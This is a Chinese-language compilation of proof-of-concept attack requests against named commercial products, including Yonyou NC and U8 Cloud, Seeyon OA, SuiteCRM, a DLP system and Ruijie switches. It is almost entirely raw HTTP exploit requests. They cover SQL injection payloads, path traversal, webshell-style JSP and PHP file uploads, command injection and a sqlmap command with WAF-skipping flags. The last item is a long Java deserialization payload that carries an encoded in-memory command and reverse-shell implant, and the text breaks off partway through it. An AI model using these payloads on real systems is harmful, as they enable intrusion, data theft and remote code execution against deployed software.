Upgrade-Insecure-Requests: 1
七、通天星CMSV6车载定位监控平台disable存在SQL注入
GET /edu_security_officer/disable;downloadLogger.action?
ids=1+AND+%28SELECT+2688+FROM+%28SELECT%28SLEEP%285%29%29%29kOIi%29 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/93.0.4577.63 Safari/537.36
Connection: close
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip, deflate
八、AnalyticsCloud 分析云存在任意文件读取漏洞
GET /.%252e/.%252e/c:/windows/win.ini HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
九、、SuiteCRM responseEntryPoint存在SQL注入漏洞
GET /index.php?
entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(5);--+
&type=c&response=accept HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15
(KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
十、亿赛通数据泄露防护(DLP)系统NetSecConfigAjax接口存在SQL注入漏洞
POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1
Host:
Cookie: JSESSIONID=99CEC1B294F4EEEA7AFC46D8D4741917;
JSESSIONID=06DCD58EDC037F785605A29CD7425C66
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="124", "Google Chrome";v="124", "Not-A.Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/124.0.0.0 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,
*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer:
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Priority: u=0, i
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 98
command=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR
DELAY '0:0:5'-
十一、用友NC querygoodsgridbycode存在SQL注入漏洞
GET /ecp/productonsale/querygoodsgridbycode.json?
code=1%27%29+AND+9976%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%2898%29%7C%
7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%289976%
3D9976%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCH
R%28118%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29--+dpxi HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Accept-Language: zh-CN,zh;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/125.0.0.0 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,
*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cache-Control: no-cache
十二、云课网校系统uploadImage存在任意文件上传漏洞
POST /api/uploader/uploadImage HTTP/1.1
Host: xx.xx.xx.xx
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,
*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: no-cache
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykvjj6DIn0LIXxe9m
x-requested-with: XMLHttpRequest
------WebKitFormBoundaryLZbmKeasWgo2gPtU
Content-Disposition: form-data; name="file"; filename="1G3311040N.php"
Content-Type: image/gif
------WebKitFormBoundaryLZbmKeasWgo2gPtU--
十三、浪潮云财务系统存在命令执行
浪潮云财务系统路径
/cwbase/gsp/webservice/bizintegrationwebservice/bizintegrationwebservice.asmx
/cwbase/service/rps/xtdysrv.asmx
十四、润乾报表前台任意文件上传漏洞
POST /InputServlet?action=12 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=00content0boundary00
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 241
Connection: close
--00content0boundary00
Content-Disposition: form-data; name="upsize"
1024
--00content0boundary00
Content-Disposition: form-data; name="file"; filename="/\..\\..\\..\2211.jsp"
Content-Type: image/jpeg
123
--00content0boundary00--
十五、启明星辰 天玥网络安全审计系统 SQL 注入漏洞
app="启明星辰-天玥网络安全审计"
python3 sqlmap.py -r test.txt --batch --skip-waf --random-agent --dbs --force-ssl
POST /ops/index.php?c=Reportguide&a=checkrn HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/121.0.0.0 Safari/537.36
Connection: close
checkname=123&tagid=123 AND 8475=(SELECT 8475 FROM PG_SLEEP(5))-- BAUh
十六、致远 OA fileUpload.do 前台文件上传绕过漏洞
POST /seeyon/autoinstall.do/../../seeyon/fileUpload.do?method=processUpload HTTP/1.1 1
Host: 2
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 3
Content-Type: multipart/form-data; boundary=skdHHhNHjhnUgerSexsksboundary 4
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML,
like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)
--skdHHhNHjhnUgerSexsksboundary
Content-Disposition: form-data; name="type"
--skdHHhNHjhnUgerSexsksboundary
Content-Disposition: form-data; name="extensions"
png--skdHHhNHjhnUgerSexsksboundary
Content-Disposition: form-data; name="applicationCategory"
--skdHHhNHjhnUgerSexsksboundary
Content-Disposition: form-data; name="destDirectory"
--skdHHhNHjhnUgerSexsksboundary
Content-Disposition: form-data; name="destFilename"
--skdHHhNHjhnUgerSexsksboundary
Content-Disposition: form-data; name="maxSize"
--skdHHhNHjhnUgerSexsksboundary
Content-Disposition: form-data; name="isEncrypt"
false
--skdHHhNHjhnUgerSexsksboundary
Content-Disposition: form-data; name="file1"; filename="1.png" 36
Content-Type: Content-Type: application/pdf
<% out.println("hello test");%>
--skdHHhNHjhnUgerSexsksboundary--
POST /seeyon/autoinstall.do/../../seeyon/privilege/menu.do HTTP/1.1
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1;
.NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)
method=uploadMenuIcon&fileid=id值&filename=testqqww.jsp
/seeyon/main/menuIcon/a123.jsp
十七、指挥调度平台invite_one_member存在远程命令执行漏洞
GET /api/client/audiobroadcast/invite_one_member.php?callee=1&roomid=`id>1.txt`HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101
Firefox/121.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=9d162ed31bcb785f6f5cb1fcc92dfff2
Upgrade-Insecure-Requests: 1
GET /api/client/audiobroadcast/1.txt HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101
Firefox/121.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=9d162ed31bcb785f6f5cb1fcc92dfff2
Upgrade-Insecure-Requests: 1
十八、指挥调度平台ajax_users存在SQL注入漏洞
POST /app/ext/ajax_users.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(123456),0x7e),NULL,NULL,NULL--
十九、锐捷 RG-NBS2026G-P交换机WEB 管理ping.htm未授权访问漏洞
/safety/ping.htm
二十、万户协同办公平台ezoffice DocumentEdit_unite.jsp SQL注入 漏洞
/defaultroot/public/iWebOfficeSign/DocumentEdit_unite.jsp;?RecordID=1
二十一、用友U8 Cloud MonitorServlet 存在反序列化漏洞
POST /service/~iufo/nc.bs.framework.mx.monitor.MonitorServlet HTTP/1.1
Host: {hostname}
Cmd: whoami
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15
(KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 16284
{{unquote("\xac\xed\x00\x05sr\x00\x11java.util.HashSet\xbaD\x85\x95\x96\xb8\xb74\x03\x0
0\x00xpw\x0c\x00\x00\x00\x02?
@\x00\x00\x00\x00\x00\x01sr\x004org.apache.commons.collections.keyvalue.TiedMapEntry\x8
a\xad\xd2\x9b9\xc1\x1f\xdb\x02\x00\x02L\x00\x03keyt\x00\x12Ljava/lang/Object;L\x00\x03m
apt\x00\x0fLjava/util/Map;xpt\x00\x03foosr\x00*org.apache.commons.collections.map.LazyM
apn\xe5\x94\x82\x9ey\x10\x94\x03\x00\x01L\x00\x07factoryt\x00,Lorg/apache/commons/colle
ctions/Transformer;xpsr\x00:org.apache.commons.collections.functors.ChainedTransformer0
\xc7\x97\xec\x28z\x97\x04\x02\x00\x01[\x00\x0diTransformerst\x00
[Lorg/apache/commons/collections/Transformer;xpur\x00
[Lorg.apache.commons.collections.Transformer;\xbdV*\xf1\xd84\x18\x99\x02\x00\x00xp\x00\
x00\x00\x04sr\x00;org.apache.commons.collections.functors.ConstantTransformerXv\x90\x11
A\x02\xb1\x94\x02\x00\x01L\x00\x09iConstantq\x00~\x00\x03xpvr\x00
javax.script.ScriptEngineManager\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00xpsr\x00:or
g.apache.commons.collections.functors.InvokerTransformer\x87\xe8\xffk\x7b|\xce8\x02\x00
\x03[\x00\x05iArgst\x00\x13[Ljava/lang/Object;L\x00\x0biMethodNamet\x00\x12Ljava/lang/S
tring;
[\x00\x0biParamTypest\x00\x12[Ljava/lang/Class;xpur\x00\x13[Ljava.lang.Object;\x90\xceX
\x9f\x10s\x29l\x02\x00\x00xp\x00\x00\x00\x00t\x00\x0bnewInstanceur\x00\x12[Ljava.lang.C
lass;\xab\x16\xd7\xae\xcb\xcdZ\x99\x02\x00\x00xp\x00\x00\x00\x00sq\x00~\x00\x13uq\x00~\
x00\x18\x00\x00\x00\x01t\x00\x02jst\x00\x0fgetEngineByNameuq\x00~\x00\x1b\x00\x00\x00\x
01vr\x00\x10java.lang.String\xa0\xf0\xa48z;\xb3B\x02\x00\x00xpsq\x00~\x00\x13uq\x00~\x0
0\x18\x00\x00\x00\x01t45try \x7b\x0a
load\x28\"nashorn:mozilla_compat.js\"\x29;\x0a\x7d catch \x28e\x29
\x7b\x7d\x0afunction getUnsafe\x28\x29\x7b\x0a var theUnsafeMethod =
java.lang.Class.forName\x28\"sun.misc.Unsafe\"\x29.getDeclaredField\x28\"theUnsafe\"\x2
9;\x0a theUnsafeMethod.setAccessible\x28true\x29; \x0a return
theUnsafeMethod.get\x28null\x29;\x0a\x7d\x0afunction
removeClassCache\x28clazz\x29\x7b\x0a var unsafe = getUnsafe\x28\x29;\x0a var
clazzAnonymousClass =
unsafe.defineAnonymousClass\x28clazz,java.lang.Class.forName\x28\"java.lang.Class\"\x29
.getResourceAsStream\x28\"Class.class\"\x29.readAllBytes\x28\x29,null\x29;\x0a var
reflectionDataField =
clazzAnonymousClass.getDeclaredField\x28\"reflectionData\"\x29;\x0a
unsafe.putObject\x28clazz,unsafe.objectFieldOffset\x28reflectionDataField\x29,null\x29;
\x0a\x7d\x0afunction bypassReflectionFilter\x28\x29 \x7b\x0a var reflectionClass;\x0a
try \x7b\x0a reflectionClass =
java.lang.Class.forName\x28\"jdk.internal.reflect.Reflection\"\x29;\x0a \x7d catch
\x28error\x29 \x7b\x0a reflectionClass =
java.lang.Class.forName\x28\"sun.reflect.Reflection\"\x29;\x0a \x7d\x0a var unsafe =
getUnsafe\x28\x29;\x0a var classBuffer =
reflectionClass.getResourceAsStream\x28\"Reflection.class\"\x29.readAllBytes\x28\x29;\x
0a var reflectionAnonymousClass = unsafe.defineAnonymousClass\x28reflectionClass,
classBuffer, null\x29;\x0a var fieldFilterMapField =
reflectionAnonymousClass.getDeclaredField\x28\"fieldFilterMap\"\x29;\x0a var
methodFilterMapField =
reflectionAnonymousClass.getDeclaredField\x28\"methodFilterMap\"\x29;\x0a if
\x28fieldFilterMapField.getType\x28\x29.isAssignableFrom\x28java.lang.Class.forName\x28
\"java.util.HashMap\"\x29\x29\x29 \x7b\x0a unsafe.putObject\x28reflectionClass,
unsafe.staticFieldOffset\x28fieldFilterMapField\x29,
java.lang.Class.forName\x28\"java.util.HashMap\"\x29.getConstructor\x28\x29.newInstance
\x28\x29\x29;\x0a \x7d\x0a if
\x28methodFilterMapField.getType\x28\x29.isAssignableFrom\x28java.lang.Class.forName\x2
8\"java.util.HashMap\"\x29\x29\x29 \x7b\x0a unsafe.putObject\x28reflectionClass,
unsafe.staticFieldOffset\x28methodFilterMapField\x29,
java.lang.Class.forName\x28\"java.util.HashMap\"\x29.getConstructor\x28\x29.newInstance
\x28\x29\x29;\x0a \x7d\x0a
removeClassCache\x28java.lang.Class.forName\x28\"java.lang.Class\"\x29\x29;\x0a\x7d\x0a
function setAccessible\x28accessibleObject\x29\x7b\x0a var unsafe =
getUnsafe\x28\x29;\x0a var overrideField =
java.lang.Class.forName\x28\"java.lang.reflect.AccessibleObject\"\x29.getDeclaredField\
x28\"override\"\x29;\x0a var offset =
unsafe.objectFieldOffset\x28overrideField\x29;\x0a
unsafe.putBoolean\x28accessibleObject, offset, true\x29;\x0a\x7d\x0afunction
defineClass\x28bytes\x29\x7b\x0a var clz = null;\x0a var version =
java.lang.System.getProperty\x28\"java.version\"\x29;\x0a var unsafe =
getUnsafe\x28\x29;\x0a var classLoader = new
java.net.URLClassLoader\x28java.lang.reflect.Array.newInstance\x28java.lang.Class.forNa
me\x28\"java.net.URL\"\x29, 0\x29\x29;\x0a try\x7b\x0a if
\x28version.split\x28\".\"\x29[0] >= 11\x29 \x7b\x0a
bypassReflectionFilter\x28\x29;\x0a defineClassMethod =
java.lang.Class.forName\x28\"java.lang.ClassLoader\"\x29.getDeclaredMethod\x28\"defineC
lass\", java.lang.Class.forName\x28\"[B\"\x29,java.lang.Integer.TYPE,
java.lang.Integer.TYPE\x29;\x0a setAccessible\x28defineClassMethod\x29;\x0a //
\xe7\xbb\x95\xe8\xbf\x87 setAccessible \x0a clz =
defineClassMethod.invoke\x28classLoader, bytes, 0, bytes.length\x29;\x0a
\x7delse\x7b\x0a var protectionDomain = new java.security.ProtectionDomain\x28new
java.security.CodeSource\x28null,
java.lang.reflect.Array.newInstance\x28java.lang.Class.forName\x28\"java.security.cert.
Certificate\"\x29, 0\x29\x29, null, classLoader, []\x29;\x0a clz =
unsafe.defineClass\x28null, bytes, 0, bytes.length, classLoader,
protectionDomain\x29;\x0a \x7d\x0a \x7dcatch\x28error\x29\x7b\x0a
error.printStackTrace\x28\x29;\x0a \x7dfinally\x7b\x0a return clz;\x0a
\x7d\x0a\x7d\x0afunction base64DecodeToByte\x28str\x29 \x7b\x0a var bt;\x0a
try\x7b\x0a bt =
java.lang.Class.forName\x28\"sun.misc.BASE64Decoder\"\x29.newInstance\x28\x29.decodeBuf
fer\x28str\x29;\x0a \x7dcatch\x28e\x29\x7b\x7d\x0a if \x28bt == null\x29\x7b\x0a
try\x7b\x0a bt =
java.lang.Class.forName\x28\"java.util.Base64\"\x29.newInstance\x28\x29.getDecoder\x28\
x29.decode\x28str\x29;\x0a \x7dcatch\x28e\x29\x7b\x7d\x0a \x7d\x0a if\x28bt ==
null\x29\x7b\x0a try\x7b\x0a bt =
java.util.Base64.getDecoder\x28\x29.decode\x28str\x29;\x0a
\x7dcatch\x28e\x29\x7b\x7d\x0a \x7d\x0a if \x28bt == null\x29\x7b\x0a bt =
java.lang.Class.forName\x28\"org.apache.commons.codec.binary.Base64\"\x29.newInstance\x
28\x29.decode\x28str\x29;\x0a \x7d\x0a return bt;\x0a\x7d\x0avar
code=\"yv66vgAAADEBmgoAHgCtCgBDAK4KAEMArwoAHgCwCACxCgAcALIKALMAtAoAswC1BwC2CgBDALcIAKUK
ACEAuAgAuQgAugcAuwgAvAgAvQcAvgoAHAC/CADACADBBwDCCwAWAMMLAMQAxQsAxADGCADHCADIBwDJCgAcAMo
HAMsKAMwAzQgAzgcAzwgA0AoAjwDRCgAhANIIANMJANQA1QoA1ADWCADXCgCPANgKABwA2QgA2gcA2woAHADcCA
DdBwDeCADfCADgCgAcAOEHAOIKAEMA4woA5ADYCADlCgAhAOYIAOcKACEA6AgA6QoAIQDqCgCPAOsIAOwKACEA7
QgA7gkAjwDvCgDUAPAJAI8A8QcA8goAQwDzCgBDAPQIAKYIAPUIAPYKAI8A9wgA+AoAjwD5BwD6CgBMAPsHAPwK
AE4A/QoAjwD+CgBOAP8KAE4BAAoATgEBCgAvAQIKAEwBAwoAIQEECAEFCgEGAQcKACEBCAgBCQgBCggBCwcBDAo
AXQCtCgBdAQ0IAQ4KAF0BAggBDwgBEAgBEQgBEgoBEwEUCgETARUHARYKARcBGAoAaAEZCAEaCgBoARsKAGgAxQ
oAaAEcCgEXAR0KARcBHggBHwgBIAoBEwEhBwEiCgB0ASMKAHQBGAoBFwEkCgB0ASQKAHQBJQoBJgEnCgEmASgKA
SkBKgoBKQEABQAAAAAAAAAyCgBDASsKARcBLAoAdAEBCAEtCgAvAS4IAS8IATAKANQBMQoAjwEyCAEzCAE0CAE1
CAE2CACpCAE3BwE4AQAMQkFTRTY0X0NIQVJTAQASTGphdmEvbGFuZy9TdHJpbmc7AQANQ29uc3RhbnRWYWx1ZQg
BOQEAAmlwAQAEcG9ydAEAE0xqYXZhL2xhbmcvSW50ZWdlcjsBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU
51bWJlclRhYmxlAQAKRXhjZXB0aW9ucwEACWxvYWRDbGFzcwEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvb
GFuZy9DbGFzczsBAAlTaWduYXR1cmUBACgoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M8Kj47
AQAFcHJveHkBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEABXdyaXRlAQA4KExqYXZ
hL2xhbmcvU3RyaW5nO0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBAApjbGVhclBhcmFtAQ
AEZXhlYwEAB3JldmVyc2UBACcoTGphdmEvbGFuZy9TdHJpbmc7SSlMamF2YS9sYW5nL1N0cmluZzsBAANydW4BA
AZkZWNvZGUBABYoTGphdmEvbGFuZy9TdHJpbmc7KVtCAQAKU291cmNlRmlsZQEAB0E0LmphdmEMAJcAmAwBOgE7
DAE8AT0MAT4BPwEAB3RocmVhZHMMAUABQQcBQgwBQwFEDAFFAUYBABNbTGphdmEvbGFuZy9UaHJlYWQ7DAFHAUg
MAUkBSgEABGh0dHABAAZ0YXJnZXQBABJqYXZhL2xhbmcvUnVubmFibGUBAAZ0aGlzJDABAAdoYW5kbGVyAQAeam
F2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uDAFLAT8BAAZnbG9iYWwBAApwcm9jZXNzb3JzAQAOamF2YS91d
GlsL0xpc3QMAUwBTQcBTgwBTwFQDAFRAVIBAANyZXEBAAtnZXRSZXNwb25zZQEAD2phdmEvbGFuZy9DbGFzcwwB
UwFUAQAQamF2YS9sYW5nL09iamVjdAcBVQwBVgFXAQAJZ2V0SGVhZGVyAQAQamF2YS9sYW5nL1N0cmluZwEAA2N
tZAwAoAChDAFYAVkBAAlzZXRTdGF0dXMHAVoMAVsBXAwBXQFeAQAkb3JnLmFwYWNoZS50b21jYXQudXRpbC5idW
YuQnl0ZUNodW5rDACcAJ0MAV8BUgEACHNldEJ5dGVzAQACW0IMAWABVAEAB2RvV3JpdGUBABNqYXZhL2xhbmcvR
XhjZXB0aW9uAQATamF2YS5uaW8uQnl0ZUJ1ZmZlcgEABHdyYXAMAWEAnQEAIGphdmEvbGFuZy9DbGFzc05vdEZv
dW5kRXhjZXB0aW9uDAFiAWMHAWQBAAAMAWUBZgEAEGNvbW1hbmQgbm90IG51bGwMAWcBSAEABSMjIyMjDAFoAWk
MAKQAoQEAAToMAWoBawEAImNvbW1hbmQgcmV2ZXJzZSBob3N0IGZvcm1hdCBlcnJvciEMAJQAkQwBbAFtDACVAJ
YBABBqYXZhL2xhbmcvVGhyZWFkDACXAW4MAW8AmAEABSQkJCQkAQASZmlsZSBmb3JtYXQgZXJyb3IhDACiAKMBA
AVAQEBAQAwApQChAQAMamF2YS9pby9GaWxlDACXAXABABhqYXZhL2lvL0ZpbGVPdXRwdXRTdHJlYW0MAJcBcQwA
qQCqDACiAXIMAXMAmAwBdACYDAF1AUgMAXYBSAwBdwF4AQAHb3MubmFtZQcBeQwBegChDAF7AUgBAAN3aW4BAAR
waW5nAQACLW4BABdqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcgwBfAF9AQAFIC1uIDQBAAIvYwEABSAtdCA0AQACc2
gBAAItYwcBfgwBfwGADAClAYEBABFqYXZhL3V0aWwvU2Nhbm5lcgcBggwBgwGEDACXAYUBAAJcYQwBhgGHDAFRA
UgMAYgBhAwBiQCYAQAHL2Jpbi9zaAEAB2NtZC5leGUMAKUBigEAD2phdmEvbmV0L1NvY2tldAwAlwGLDAGMAY0M
AY4BUAcBjwwBkAGRDAGSAZEHAZMMAKIBlAwBlQGWDAGXAZEBAB1yZXZlcnNlIGV4ZWN1dGUgZXJyb3IsIG1zZyA
tPgwBmAFIAQABIQEAE3JldmVyc2UgZXhlY3V0ZSBvayEMAZkBkQwApgCnAQAWc3VuLm1pc2MuQkFTRTY0RGVjb2
RlcgEADGRlY29kZUJ1ZmZlcgEAEGphdmEudXRpbC5CYXNlNjQBAApnZXREZWNvZGVyAQAmb3JnLmFwYWNoZS5jb
21tb25zLmNvZGVjLmJpbmFyeS5CYXNlNjQBAAJBNAEAQEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVm
Z2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8BAA1jdXJyZW50VGhyZWFkAQAUKClMamF2YS9sYW5nL1R
ocmVhZDsBAA5nZXRUaHJlYWRHcm91cAEAGSgpTGphdmEvbGFuZy9UaHJlYWRHcm91cDsBAAhnZXRDbGFzcwEAEy
gpTGphdmEvbGFuZy9DbGFzczsBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2Y
S9sYW5nL3JlZmxlY3QvRmllbGQ7AQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBAA1zZXRBY2Nlc3NpYmxlAQAE
KFopVgEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAHZ2V0TmFtZQEAFCg
pTGphdmEvbGFuZy9TdHJpbmc7AQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoBAA1nZX
RTdXBlcmNsYXNzAQAIaXRlcmF0b3IBABYoKUxqYXZhL3V0aWwvSXRlcmF0b3I7AQASamF2YS91dGlsL0l0ZXJhd
G9yAQAHaGFzTmV4dAEAAygpWgEABG5leHQBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwEACWdldE1ldGhvZAEAQChM
amF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBABh
qYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbm
cvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAhnZXRCeXRlcwEABCgpW0IBABFqYXZhL2xhbmcvSW50ZWdlc
gEABFRZUEUBABFMamF2YS9sYW5nL0NsYXNzOwEAB3ZhbHVlT2YBABYoSSlMamF2YS9sYW5nL0ludGVnZXI7AQAL
bmV3SW5zdGFuY2UBABFnZXREZWNsYXJlZE1ldGhvZAEAB2Zvck5hbWUBABVnZXRDb250ZXh0Q2xhc3NMb2FkZXI
BABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyAQAGZXF1YWxzAQAVKE
xqYXZhL2xhbmcvT2JqZWN0OylaAQAEdHJpbQEACnN0YXJ0c1dpdGgBABUoTGphdmEvbGFuZy9TdHJpbmc7KVoBA
AVzcGxpdAEAJyhMamF2YS9sYW5nL1N0cmluZzspW0xqYXZhL2xhbmcvU3RyaW5nOwEACHBhcnNlSW50AQAVKExq
YXZhL2xhbmcvU3RyaW5nOylJAQAXKExqYXZhL2xhbmcvUnVubmFibGU7KVYBAAVzdGFydAEAFShMamF2YS9sYW5
nL1N0cmluZzspVgEAEShMamF2YS9pby9GaWxlOylWAQAFKFtCKVYBAAVmbHVzaAEABWNsb3NlAQAIdG9TdHJpbm
cBAA9nZXRBYnNvbHV0ZVBhdGgBAAdyZXBsYWNlAQBEKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlO0xqYXZhL2xhb
mcvQ2hhclNlcXVlbmNlOylMamF2YS9sYW5nL1N0cmluZzsBABBqYXZhL2xhbmcvU3lzdGVtAQALZ2V0UHJvcGVy
dHkBAAt0b0xvd2VyQ2FzZQEABmFwcGVuZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmd
CdWlsZGVyOwEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOw
EAKChbTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEAD
mdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07
KVYBAAx1c2VEZWxpbWl0ZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvU2Nhbm5lcjsBAA5nZXR
FcnJvclN0cmVhbQEAB2Rlc3Ryb3kBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAB
YoTGphdmEvbGFuZy9TdHJpbmc7SSlWAQAPZ2V0T3V0cHV0U3RyZWFtAQAYKClMamF2YS9pby9PdXRwdXRTdHJlY
W07AQAIaXNDbG9zZWQBABNqYXZhL2lvL0lucHV0U3RyZWFtAQAJYXZhaWxhYmxlAQADKClJAQAEcmVhZAEAFGph
dmEvaW8vT3V0cHV0U3RyZWFtAQAEKEkpVgEABXNsZWVwAQAEKEopVgEACWV4aXRWYWx1ZQEACmdldE1lc3NhZ2U
BAAhpbnRWYWx1ZQAhAI8AHgABAA8AAwAaAJAAkQABAJIAAAACAJMAAgCUAJEAAAACAJUAlgAAAAkAAQCXAJgAAg
CZAAADtgAGABMAAAKOKrcAAbgAArYAA0wrtgAEEgW2AAZNLAS2AAcsK7YACMAACcAACU4tOgQZBL42BQM2BhUGF
QWiAlgZBBUGMjoHGQfHAAanAkMZB7YACjoIGQgSC7YADJoADRkIEg22AAyaAAanAiUZB7YABBIOtgAGTSwEtgAH
LBkHtgAIOgkZCcEAD5oABqcCAhkJtgAEEhC2AAZNLAS2AAcsGQm2AAg6CRkJtgAEEhG2AAZNpwAWOgoZCbYABLY
AE7YAExIRtgAGTSwEtgAHLBkJtgAIOgkZCbYABLYAExIUtgAGTacAEDoKGQm2AAQSFLYABk0sBLYABywZCbYACD
oJGQm2AAQSFbYABk0sBLYABywZCbYACMAAFsAAFjoKGQq5ABcBADoLGQu5ABgBAJkBWxkLuQAZAQA6DBkMtgAEE
hq2AAZNLAS2AAcsGQy2AAg6DRkNtgAEEhsDvQActgAdGQ0DvQAetgAfOg4ZDbYABBIgBL0AHFkDEiFTtgAdGQ0E
